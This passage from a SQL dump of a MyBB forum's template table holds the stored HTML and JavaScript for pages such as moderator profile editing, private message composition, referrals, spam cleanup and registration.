{$bdaymonthsel[\'2\']}>{$lang->month_2}</option> <option value=\"3\" {$bdaymonthsel[\'3\']}>{$lang->month_3}</option> <option value=\"4\" {$bdaymonthsel[\'4\']}>{$lang->month_4}</option> <option value=\"5\" {$bdaymonthsel[\'5\']}>{$lang->month_5}</option> <option value=\"6\" {$bdaymonthsel[\'6\']}>{$lang->month_6}</option> <option value=\"7\" {$bdaymonthsel[\'7\']}>{$lang->month_7}</option> <option value=\"8\" {$bdaymonthsel[\'8\']}>{$lang->month_8}</option> <option value=\"9\" {$bdaymonthsel[\'9\']}>{$lang->month_9}</option> <option value=\"10\" {$bdaymonthsel[\'10\']}>{$lang->month_10}</option> <option value=\"11\" {$bdaymonthsel[\'11\']}>{$lang->month_11}</option> <option value=\"12\" {$bdaymonthsel[\'12\']}>{$lang->month_12}</option> </select> </td> <td> <input type=\"text\" class=\"textbox\" size=\"4\" maxlength=\"4\" name=\"birthday_year\" value=\"{$mybb->input[\'birthday_year\']}\" /> </td> </tr> <tr> <td colspan=\"3\"><span class=\"smalltext\">{$lang->website_url}</span></td> </tr> <tr> <td colspan=\"3\"><input type=\"text\" class=\"textbox\" name=\"website\" size=\"25\" maxlength=\"75\" value=\"{$mybb->input[\'website\']}\" /></td> </tr> </table> </fieldset> {$privatewarning} {$customfields} </td> <td width=\"50%\" class=\"trow1\" valign=\"top\"> <fieldset class=\"trow2\"> <legend><strong>{$lang->custom_usertitle}</strong></legend> <table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\"> <tr> <td><span class=\"smalltext\">{$lang->custom_usertitle_note}</span></td> </tr> <tr> <td><span class=\"smalltext\">{$lang->default_usertitle}</span></td> </tr> <tr> <td><span class=\"smalltext\"><strong>{$defaulttitle}</strong></span></td> </tr> <tr> <td><span class=\"smalltext\">{$lang->current_custom_usertitle}</span></td> </tr> <tr> <td><span class=\"smalltext\"><strong>{$user[\'usertitle\']}</strong></span></td> </tr> <tr> <td><span class=\"smalltext\">{$lang->new_custom_usertitle}</span></td> </tr> <tr> <td><input type=\"text\" class=\"textbox\" name=\"usertitle\" size=\"25\" maxlength=\"{$mybb->settings[\'customtitlemaxlength\']}\" value=\"{$newtitle}\" /></td> </tr> <tr> <td><span class=\"smalltext\"><input type=\"checkbox\" name=\"reverttitle\" id=\"reverttitle\" class=\"checkbox\" /> {$lang->revert_usertitle}</span></td> </tr> </table> </fieldset> <br /> <fieldset class=\"trow2\"> <legend><strong>{$lang->additional_contact_details}</strong></legend> <table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\"> <tr> <td><span class=\"smalltext\">{$lang->icq_number}</span></td> </tr> <tr> <td><input type=\"text\" class=\"textbox\" name=\"icq\" size=\"25\" value=\"{$mybb->input[\'icq\']}\" /></td> </tr> <tr> <td><span class=\"smalltext\">{$lang->aim_screenname}</span></td> </tr> <tr> <td><input type=\"text\" class=\"textbox\" name=\"aim\" size=\"25\" value=\"{$mybb->input[\'aim\']}\" /></td> </tr> <tr> <td><span class=\"smalltext\">{$lang->msn}</span></td> </tr> <tr> <td><input type=\"text\" class=\"textbox\" name=\"msn\" size=\"25\" value=\"{$mybb->input[\'msn\']}\" /></td> </tr> <tr> <td><span class=\"smalltext\">{$lang->yahoo_id}</span></td> </tr> <tr> <td><input type=\"text\" class=\"textbox\" name=\"yahoo\" size=\"25\" value=\"{$mybb->input[\'yahoo\']}\" /></td> </tr> </table> </fieldset> <br /> <fieldset class=\"trow2\"> <legend><strong>{$lang->moderation}</strong></legend> <table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\" width=\"100%\"> <tr> <td> <dl style=\"margin-top: 0; margin-bottom: 0;\"> <dt><label><input type=\"checkbox\" name=\"moderateposting\" value=\"1\" {$modpost_checked} class=\"checkbox\" onclick=\"toggleSuspend(\'modposts\');\" id=\"modpost\" /> {$lang->moderate_posts}</label></dt> <dd style=\"margin-top: 4px;\" id=\"modposts_action\"> <table cellpadding=\"4\"> {$moderateposts_info} <tr> <td width=\"35%\">{$lang->modpost_length}</td> <td><input type=\"text\" name=\"modpost_time\" value=\"{$mybb->input[\'modpost_time\']}\" class=\"textbox\" style=\"width: 2em;\" /> {$modpost_options}</td> </tr> </table> </dd> </dl> </td> </tr> <tr> <td> <dl style=\"margin-top: 0; margin-bottom: 0;\"> <dt><label><input type=\"checkbox\" name=\"suspendposting\" value=\"1\" {$suspost_checked} class=\"checkbox\" onclick=\"toggleSuspend(\'susposts\');\" id=\"suspost\" /> {$lang->suspend_posts}</label></dt> <dd style=\"margin-top: 4px;\" id=\"susposts_action\"> <table cellpadding=\"4\"> {$suspendposting_info} <tr> <td width=\"35%\">{$lang->suspost_length}</td> <td><input type=\"text\" name=\"suspost_time\" value=\"{$mybb->input[\'suspost_time\']}\" class=\"textbox\" style=\"width: 2em;\" /> {$suspost_options}</td> </tr> </table> </dd> </dl></td> </tr> </table> </fieldset> </td> </tr> <tr> <td colspan=\"2\" class=\"trow1\" valign=\"top\"> <fieldset class=\"trow1\"> <legend><strong>{$lang->signature}</strong></legend> <table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\"> <tr> <td class=\"trow1\" width=\"80%\"> <textarea rows=\"15\" cols=\"70\" id=\"signature\" name=\"signature\">{$user[\'signature\']}</textarea> {$codebuttons} </td> </tr> {$suspend_signature} </table> </fieldset> </td> </tr> <tr> <td colspan=\"2\" class=\"trow1\" valign=\"top\"> <fieldset class=\"trow2\"> <legend><strong>{$lang->mod_notes}</strong></legend> <textarea name=\"usernotes\" id=\"usernotes\" rows=\"10\" cols=\"70\">{$user[\'usernotes\']}</textarea> </fieldset> </td> </tr> </table> <br /> <div align=\"center\"> <input type=\"hidden\" name=\"action\" value=\"do_editprofile\" /> <input type=\"hidden\" name=\"uid\" value=\"{$user[\'uid\']}\" /> <input type=\"submit\" class=\"button\" value=\"{$lang->update_profile}\" /> </div> </td> </tr> </table> </form> {$footer} <script type=\"text/javascript\"> <!-- if(mod_posts == 0) { $(\'modposts_action\').hide(); } if(susp_posts == 0) { $(\'susposts_action\').hide(); } function toggleSuspend(action) { var item = action + \"_action\"; if(action == \"modposts\") { $(\'susposts_action\').hide(); $(\'suspost\').checked = false; if($(\"modpost\").checked == false) { $(\"modpost\").checked = false; $(\"modposts_action\").hide(); } else { $(\"modpost\").checked = true; $(\"modposts_action\").show(); } } if(action == \"susposts\") { $(\'modposts_action\').hide(); $(\'modpost\').checked = false; if($(\"suspost\").checked == false) { $(\"suspost\").checked = false; $(\"susposts_action\").hide(); } else { $(\"suspost\").checked = true; $(\"susposts_action\").show(); } } } // --> </script> </body> </html>', '1', '1608', '', '1339904267'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1891', 'private_send', '<html> <head> <title>{$lang->compose_pm}</title> {$headerinclude} <script type=\"text/javascript\" src=\"jscripts/usercp.js?ver=1600\"></script> </head> <body> {$header} <form action=\"private.php\" method=\"post\" name=\"input\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$usercpnav} <td valign=\"top\"> {$preview} {$send_errors} {$privatewarning} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->compose_pm}</strong></td> </tr> <tr> <td class=\"trow1\" valign=\"top\" width=\"200\"><strong>{$lang->compose_to}</strong> <script type=\"text/javascript\"> <!-- document.write(\'(<a href=\"#\" onclick=\"showBcc(); return false;\" title=\"{$lang->compose_bcc_show_title}\">{$lang->compose_bcc_show}<\\/a>)\'); // --> </script> <br /><span class=\"smalltext\">{$lang->separate_names}{$buddy_select_to}</span></td> <td class=\"trow1\" valign=\"top\"><textarea name=\"to\" id=\"to\" rows=\"2\" cols=\"38\" tabindex=\"1\">{$to}</textarea>{$max_recipients}</td> </tr> <tr id=\"bcc_area\"> <td class=\"trow2\" valign=\"top\"><strong>{$lang->compose_bcc}</strong>{$buddy_select_bcc}</td> <td class=\"trow2\"><textarea name=\"bcc\" id=\"bcc\" rows=\"2\" cols=\"38\" tabindex=\"1\">{$bcc}</textarea></td> </tr> <tr> <td class=\"trow1\"><strong>{$lang->compose_subject}</strong></td> <td class=\"trow1\"><input type=\"text\" class=\"textbox\" name=\"subject\" size=\"40\" maxlength=\"85\" value=\"{$subject}\" tabindex=\"3\" /></td> </tr> {$posticons} <tr> <td class=\"trow2\" valign=\"top\"><strong>{$lang->compose_message}</strong>{$smilieinserter}</td> <td class=\"trow2\"> <textarea name=\"message\" id=\"message\" rows=\"20\" cols=\"70\" tabindex=\"4\">{$message}</textarea> {$codebuttons} </td> </tr> <tr> <td class=\"trow1\" valign=\"top\"><strong>{$lang->compose_options}</strong></td> <td class=\"trow1\"><span class=\"smalltext\"> <label><input type=\"checkbox\" class=\"checkbox\" name=\"options[signature]\" value=\"1\" tabindex=\"5\" {$optionschecked[\'signature\']} />{$lang->options_sig}</label><br /> <label><input type=\"checkbox\" class=\"checkbox\" name=\"options[disablesmilies]\" value=\"1\" tabindex=\"6\" {$optionschecked[\'disablesmilies\']} />{$lang->options_disable_smilies}</label><br /> <label><input type=\"checkbox\" class=\"checkbox\" name=\"options[savecopy]\" value=\"1\" tabindex=\"7\" {$optionschecked[\'savecopy\']} />{$lang->options_save_copy}</label><br /> <label><input type=\"checkbox\" class=\"checkbox\" name=\"options[readreceipt]\" value=\"1\" tabindex=\"8\" {$optionschecked[\'readreceipt\']} />{$lang->options_read_receipt}</label><br /> </span></td> </tr> </table> <br /> <input type=\"hidden\" name=\"action\" value=\"do_send\" /> <input type=\"hidden\" name=\"pmid\" value=\"{$pmid}\" /> <input type=\"hidden\" name=\"do\" value=\"{$do}\" /> <div style=\"text-align: center;\"> <input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->send_message}\" tabindex=\"9\" accesskey=\"s\" /> <input type=\"submit\" class=\"button\" name=\"saveasdraft\" value=\"{$lang->save_draft}\" tabindex=\"10\" /> <input type=\"submit\" class=\"button\" name=\"preview\" value=\"{$lang->preview}\" tabindex=\"11\" /> </div> </td> </tr> </table> </form> {$footer} <script type=\"text/javascript\"> <!-- if($(\'bcc_area\') && $(\'bcc\').value == \"\") { $(\'bcc_area\').style.display = \'none\'; } function showBcc() { if($(\'bcc_area\').style.display == \'none\') { $(\'bcc_area\').style.display = \'\'; } else { $(\'bcc_area\').style.display = \'none\'; } } // --> </script> {$autocompletejs} </body> </html>', '1', '1608', '', '1339904267'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1895', 'donation_page', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$mybb->settings[\'dp_title\']}</title> {$headerinclude} {$formcheck} </head> <body> {$header} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\"><strong>{$mybb->settings[\'dp_title\']}</strong></td> </tr> <tr> <td width=\"100%\" class=\"trow1\"> {$message} {$paypalform} {$credits} </td> </tr> </table> {$footer} </body> </html>', '-1', '', '', '1339907969'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2038', 'refer_drow', '<tr> <td class=\"trow2\">{$husername}</td> <td class=\"trow1\" align=\"center\">{$date}</td> <td class=\"trow2\" align=\"center\">{$activated}</td> </tr>', '-1', '1', '', '1346459916'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2039', 'refer_toplist', '<html> <head> <title>{$mybb->settings[bbname]} - {$lang->refer_toplist}</title> {$headerinclude} </head> <body> {$header} <div class=\"smalltext\" align=\"center\">[<a href=\"refer.php?action=invite\">{$lang->refer_new}</a>]</div> <br /> <table border=\"0\" cellspacing=\"{$theme[borderwidth]}\" cellpadding=\"{$theme[tablespace]}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"3\"><strong>{$lang->refer_toplist}</strong></td> </tr> <tr> <td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->username}</strong></span></td> <td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->referrals}</strong></span></td> </tr> {$refer_toprow} <tr> <td align=\"center\" colspan=\"3\" class=\"thead\"> &nbsp; </td> </tr> </table> {$footer} </body> </html>', '-1', '1', '', '1346459916'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2040', 'refer_toprow', '<tr> <td class=\"trow2\">{$rusername}</td> <td class=\"trow1\" align=\"center\">{$referraltotals}</td> </tr>', '-1', '1', '', '1346459916'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2036', 'refer_profile', '<tr> <td class=\"trow1\"><strong>Referrals: </strong></td> <td class=\"trow1\">{$easyrefer_count} {$easyrefer_link}</td> </tr>', '-1', '1', '', '1346459916'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2037', 'refer_details', '<html> <head> <title>{$mybb->settings[bbname]} - {$lang->refer_details}</title> {$headerinclude} </head> <body> {$header} <div class=\"smalltext\" align=\"center\">[<a href=\"refer.php?action=invite\">{$lang->refer_new}</a>] [<a href=\"refer.php?action=toplist\">{$lang->refer_toplink}</a>]</div> <br /> <table border=\"0\" cellspacing=\"{$theme[borderwidth]}\" cellpadding=\"{$theme[tablespace]}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"3\"><strong>{$rusername} {$lang->refer_details}</strong></td> </tr> <tr> <td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->username}</strong></span></td> <td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->joindate}</strong></span></td> <td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->activated}</strong></span></td> </tr> {$refer_drow} <tr> <td align=\"center\" colspan=\"3\" class=\"thead\"> &nbsp; </td> </tr> </table> {$footer} </body> </html>', '-1', '1', '', '1346459916'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1902', 'usercp_nav_misc', '<tr> <td class=\"tcat\"> <div class=\"expcolimage\"><img src=\"{$theme[\'imgdir\']}/collapse{$collapsedimg[\'usercpmisc\']}.gif\" id=\"usercpmisc_img\" class=\"expander\" alt=\"[-]\" title=\"[-]\" /></div> <div><span class=\"smalltext\"><strong>{$lang->ucp_nav_misc}</strong></span></div> </td> </tr> <tbody style=\"{$collapsed[\'usercpmisc_e\']}\" id=\"usercpmisc_e\"> <tr><td class=\"trow1 smalltext\"><a href=\"usercp.php?action=usergroups\" class=\"usercp_nav_item usercp_nav_usergroups\">{$lang->ucp_nav_usergroups}</a></td></tr> <tr><td class=\"trow1 smalltext\"><a href=\"usercp.php?action=editlists\" class=\"usercp_nav_item usercp_nav_editlists\">{$lang->ucp_nav_editlists}</a></td></tr> <tr><td class=\"trow1 smalltext\"><a href=\"usercp.php?action=attachments\" class=\"usercp_nav_item usercp_nav_attachments\">{$lang->ucp_nav_attachments}</a></td></tr> <tr><td class=\"trow1 smalltext\">{$draftstart}<a href=\"usercp.php?action=drafts\" class=\"usercp_nav_item usercp_nav_drafts\">{$lang->ucp_nav_drafts} {$draftcount}</a>{$draftend}</td></tr> <tr><td class=\"trow1 smalltext\"><a href=\"usercp.php?action=subscriptions\" class=\"usercp_nav_item usercp_nav_subscriptions\">{$lang->ucp_nav_subscribed_threads}</a></td></tr> <tr><td class=\"trow1 smalltext\"><a href=\"usercp.php?action=forumsubscriptions\" class=\"usercp_nav_item usercp_nav_fsubscriptions\">{$lang->ucp_nav_forum_subscriptions}</a></td></tr> <tr><td class=\"trow1 smalltext\"><a href=\"{$profile_link}\" class=\"usercp_nav_item usercp_nav_viewprofile\">{$lang->ucp_nav_view_profile}</a></td></tr> <tr><td class=\"trow1 smalltext\"><a href=\"refer.php?action=invite\">Refer A Member</a></td></tbody>', '1', '1608', '', '1339908022'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2035', 'refer', '<html> <head> <title>{$mybb->settings[bbname]} - {$lang->title}</title> {$headerinclude} </head> <body> {$header} {$errors} <table border=\"0\" cellspacing=\"{$theme[borderwidth]}\" cellpadding=\"{$theme[tablespace]}\" class=\"tborder\"> <tr> <td class=\"thead\"><strong>{$title}</strong></td> </tr> <tr> <td class=\"trow1\" align=\"center\"> <form action=\"refer.php\" method=\"post\" name=\"refer\" id=\"refer\"> <table border=\"0\" cellspacing=\"1\" width=\"75%\" cellpadding=\"4\"> <tr align=\"left\"> <td> <fieldset class=\"trow2\"> <legend><strong>{$lang->details}</strong></legend> <label for=\"emailaddress\">{$lang->email}</label><br /> <input class=\"text\" name=\"email\" type=\"text\" id=\"emailaddress\" value=\"{$email}\" size=\"40\" /></fieldset> </td> </tr> <tr align=\"left\"> <td> <fieldset class=\"trow2\"> <legend><strong>{$lang->message}</strong></legend> <div>{$refermessage}<div> </fieldset> </td> </tr> <tr align=\"left\"> <td> <fieldset class=\"trow2\"> <legend><strong>{$lang->addmessage}</strong></legend> <textarea name=\"addmessage\" cols=\"60\" rows=\"8\" id=\"addmessage\">{$addmessage}</textarea> </fieldset> {$regimage} </td> </tr> </table> <input class=\"button\" name=\"send\" type=\"submit\" id=\"send\" value=\"Send\" /> <input name=\"action\" type=\"hidden\" value=\"do_send_refer\" /> <input name=\"my_post_key\" type=\"hidden\" value=\"$mybb->post_code\" /> </form> </td> </tr> </table> <br /> <table border=\"0\" cellspacing=\"{$theme[borderwidth]}\" cellpadding=\"{$theme[tablespace]}\" class=\"tborder\"> <tr> <td class=\"thead\"><strong>{$lang->referlinktitle}</strong></td> </tr> <tr> <td class=\"trow1\" align=\"center\"><textarea cols=\"100\">{$referlink}</textarea></td> </tr> </table> {$footer} </body> </html>', '-1', '1.0', '', '1346459916'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2031', 'goodbyespammer_option_checkbox', '<tr> <td class=\"{$altbg}\" width=\"99%\"><label for=\"actions_{$action}\"><strong>{$title}</strong></label><br />{$description}</td> <td class=\"{$altbg}\" width=\"1%\" align=\"center\"><input type=\"checkbox\" name=\"actions[{$action}]\" id=\"actions_{$action}\" value=\"1\"{$checked}{$disabled} /></td> </tr>', '-1', '1600', '', '1346459787'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2032', 'goodbyespammer_option_textbox', '<tr> <td class=\"{$altbg}\" width=\"100%\" colspan=\"2\"><label for=\"actions_{$action}\"><strong>{$title}</strong></label><br />{$description}<br /><input type=\"text\" name=\"actions[{$action}]\" id=\"actions_{$action}\" value=\"{$text}\" /></td> </tr>', '-1', '1600', '', '1346459787'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2033', 'goodbyespammer_profile_link', '<tr> <td class=\"trow1\"> <a href=\"{$mybb->settings[\'bburl\']}/misc.php?action=goodbyespammer&amp;uid={$memprofile[\'uid\']}\">{$lang->goodbyespammer_profile}</a> </td> </tr>', '-1', '1600', '', '1346459787'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2030', 'goodbyespammer', '<html> <head> <title>{$lang->goodbyespammer}</title> {$headerinclude} </head> <body> {$header} <form method=\"post\" action=\"misc.php\"> <input type=\"hidden\" name=\"action\" value=\"do_goodbyespammer\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->goodbyespammer_actionstotake}</strong></td> </tr> <tr> <td class=\"tcat\" colspan=\"2\">{$lang->goodbyespammer_desc}</td> </tr> {$options} <tr> <td class=\"tfoot\" colspan=\"2\" align=\"center\"><input type=\"submit\" value=\"{$lang->goodbyespammer_submit}\" /></td> </tr> </table> <input type=\"hidden\" name=\"uid\" value=\"{$mybb->input[\'uid\']}\" /> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> </form> {$footer} </body> </html>', '-1', '1600', '', '1346459787'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1907', 'member_profile_modoptions', ' <br /><table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" width=\"100%\" class=\"tborder\"> <tr> <td colspan=\"2\" class=\"thead\"><strong>{$lang->mod_options}</strong></td> </tr> <tr> <td class=\"trow1\"> <ul> <li><a href=\"{$mybb->settings[\'bburl\']}/modcp.php?action=editprofile&amp;uid={$uid}\">{$lang->edit_in_mcp}</a></li> <li><a href=\"{$mybb->settings[\'bburl\']}/modcp.php?action=banuser&amp;uid={$uid}\">{$lang->ban_in_mcp}</a></li> </ul> </td> </tr> <tr> <td class=\"trow2\"> {$memprofile[\'usernotes\']}<br /> <a href=\"{$mybb->settings[\'bburl\']}/modcp.php?action=editprofile&amp;uid={$uid}\">{$lang->edit_usernotes}</a> </td> </tr> {goodbyespammer}</table> ', '1', '1608', '', '1339993817'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1951', 'member_register', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->registration}</title> {$headerinclude} <script type=\"text/javascript\" src=\"jscripts/validator.js\"></script> </head> <body> {$header} <br /> <form action=\"member.php\" method=\"post\" id=\"registration_form\"><input type=\"text\" style=\"visibility: hidden;\" value=\"\" name=\"regcheck1\" /><input type=\"text\" style=\"visibility: hidden;\" value=\"true\" name=\"regcheck2\" /> {$regerrors} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->registration}</strong></td> </tr> <tr> <td width=\"50%\" class=\"trow1\" valign=\"top\"> <fieldset class=\"trow2\"> <legend><strong>{$lang->account_details}</strong></legend> <table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\" width=\"100%\"> <tr> <td colspan=\"2\"><span class=\"smalltext\"><label for=\"username\">{$lang->username}</label></span></td> </tr> <tr> <td colspan=\"2\"><input type=\"text\" class=\"textbox\" name=\"username\" id=\"username\" style=\"width: 100%\" value=\"{$username}\" /></td> </tr> {$passboxes} <tr> <td><span class=\"smalltext\"><label for=\"email\">{$lang->email}</label></span></td> <td><span class=\"smalltext\"><label for=\"email2\">{$lang->confirm_email}</label></span></td> </tr> <tr> <td><input type=\"text\" class=\"textbox\" name=\"email\" id=\"email\" style=\"width: 100%\" maxlength=\"50\" value=\"{$email}\" /></td> <td><input type=\"text\" class=\"textbox\" name=\"email2\" id=\"email2\" style=\"width: 100%\" maxlength=\"50\" value=\"{$email2}\" /></td> </tr> <tr> <td colspan=\"2\" style=\"display: none;\" id=\"email_status\">&nbsp;</td> </tr> {$hiddencaptcha} </table> </fieldset> {$requiredfields} {$referrer} {$regimage} </td> <td width=\"50%\" class=\"trow1\" valign=\"top\"> <fieldset class=\"trow2\"> <legend><strong>{$lang->account_prefs}</strong></legend> <table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\" width=\"100%\"> <tr> <td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"allownotices\" id=\"allownotices\" value=\"1\" {$allownoticescheck} /></td> <td valign=\"top\"><span class=\"smalltext\"><label for=\"allownotices\">{$lang->allow_notices}</label></span></td> </tr> <tr> <td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"hideemail\" id=\"hideemail\" value=\"1\" {$hideemailcheck} /></td> <td valign=\"top\"><span class=\"smalltext\"><label for=\"hideemail\">{$lang->hide_email}</label></span></td> </tr> <tr> <td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"receivepms\" id=\"receivepms\" value=\"1\" {$receivepmscheck} /></td> <td valign=\"top\"><span class=\"smalltext\"><label for=\"receivepms\">{$lang->receive_pms}</label></span></td> </tr> <tr> <td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"pmnotice\" id=\"pmnotice\" value=\"1\"{$pmnoticecheck} /></td> <td valign=\"top\"><span class=\"smalltext\"><label for=\"pmnotice\">{$lang->pm_notice}</label></span></td> </tr> <tr> <td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"emailpmnotify\" id=\"emailpmnotify\" value=\"1\" {$emailpmnotifycheck} /></td> <td valign=\"top\"><span class=\"smalltext\"><label for=\"emailpmnotify\">{$lang->email_notify_newpm}</label></span></td> </tr> <tr> <td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"invisible\" id=\"invisible\" value=\"1\" {$invisiblecheck} /></td> <td valign=\"top\"><span class=\"smalltext\"><label for=\"invisible\">{$lang->invisible_mode}</label></span></td> </tr> <tr> <td colspan=\"2\"><span class=\"smalltext\"><label for=\"subscriptionmethod\">{$lang->subscription_method}</label></span></td> </tr> <tr> <td colspan=\"2\"> <select name=\"subscriptionmethod\" id=\"subscriptionmethod\"> <option value=\"0\" {$no_subscribe_selected}>{$lang->no_auto_subscribe}</option> <option value=\"1\" {$no_email_subscribe_selected}>{$lang->no_email_subscribe}</option> <option value=\"2\" {$instant_email_subscribe_selected}>{$lang->instant_email_subscribe}</option> </select> </td> </tr> </table> </fieldset> <br /> <fieldset class=\"trow2\"> <legend><strong><label for=\"timezone\">{$lang->time_offset}</label></strong></legend> <table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\" width=\"100%\"> <tr> <td><span class=\"smalltext\">{$lang->time_offset_desc}</span></td> </tr> <tr> <td>{$tzselect}</td> </tr> <tr> <td><span class=\"smalltext\">{$lang->dst_correction}</span></td> </tr> <tr> <td> <select name=\"dstcorrection\"> <option value=\"2\" {$dst_auto_selected}>{$lang->dst_correction_auto}</option> <option value=\"1\" {$dst_enabled_selected}>{$lang->dst_correction_enabled}</option> <option value=\"0\" {$dst_disabled_selected}>{$lang->dst_correction_disabled}</option> </select> </td> </tr> </table> </fieldset> <br /> <fieldset class=\"trow2\"> <legend><strong><label for=\"language\">{$lang->lang_select}</label></strong></legend> <table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\" width=\"100%\"> <tr> <td colspan=\"2\"><span class=\"smalltext\">{$lang->lang_select_desc}</span></td> </tr> <tr> <td><select name=\"language\" id=\"language\"><option value=\"\">{$lang->lang_select_default}</option><option value=\"\">-----------</option>{$langoptions}</select></td> </tr> </table> </fieldset> </td> </tr> </table> <br /> <div align=\"center\"> <input type=\"hidden\" name=\"step\" value=\"registration\" /> <input type=\"hidden\" name=\"action\" value=\"do_register\" /> <input type=\"submit\" class=\"button\" name=\"regsubmit\" value=\"{$lang->submit_registration}\" /> </div> </form> <script type=\"text/javascript\"> <!-- regValidator = new FormValidator(\'registration_form\'); regValidator.register(\'username\', \'notEmpty\', {failure_message:\'{$lang->js_validator_no_username}\'}); regValidator.register(\'email\', \'regexp\', {match_field:\'email2\', regexp:\'^([a-zA-Z0-9_\\\\.\\\\+\\\\-])+\\\\@(([a-zA-Z0-9\\\\-])+\\\\.)+([a-zA-Z0-9]{2,4})+$\', failure_message:\'{$lang->js_validator_invalid_email}\'}); regValidator.register(\'email2\', \'matches\', {match_field:\'email\', status_field:\'email_status\', failure_message:\'{$lang->js_validator_email_match}\'}); {$validator_extra} regValidator.register(\'username\', \'ajax\', {url:\'xmlhttp.php?action=strictUsername_Validate\', loading_message:\'{$lang->js_validator_checking_username}\'}); // needs to be last // --> </script> {$footer} </body> </html>', '1', '1608', '', '1342193829'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1953', 'header_welcomeblock_guest', '<div id=\"panel\"> <script type=\"text/javascript\"> <!-- lang.username = \"{$lang->login_username}\"; lang.password = \"{$lang->login_password}\"; lang.login = \"{$lang->login}\"; lang.lost_password = \" &mdash; <a href=\\\"{$mybb->settings[\'bburl\']}/member.php?action=lostpw\\\">{$lang->lost_password}<\\/a>\"; lang.register_url = \" &mdash; <a href=\\\"{$mybb->settings[\'bburl\']}/member.php?action=register\\\">{$lang->welcome_register}<\\/a>\"; lang.remember_me = \"{$lang->remember_me}\"; // --> </script> <span style=\"float: right;\">{$lang->welcome_current_time}</span> <span id=\"quick_login\">{$lang->welcome_guest} (<a href=\"{$mybb->settings[\'bburl\']}/member.php?action=login\" onclick=\"MyBB.quickLogin(); return false;\"><span style=\"color: white;\">{$lang->welcome_login}</span></a> &mdash; <a href=\"{$mybb->settings[\'bburl\']}/member.php?action=register\"><span style=\"color: white;\">{$lang->welcome_register}</span></a>)</span> </div>', '8', '1608', '', '1345052930'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1954', 'private', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->private_messaging}</title> {$headerinclude} </head> <body> {$header} <form action=\"private.php\" method=\"post\" name=\"pmForm\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$usercpnav} <td valign=\"top\"> <table border=\"0\" 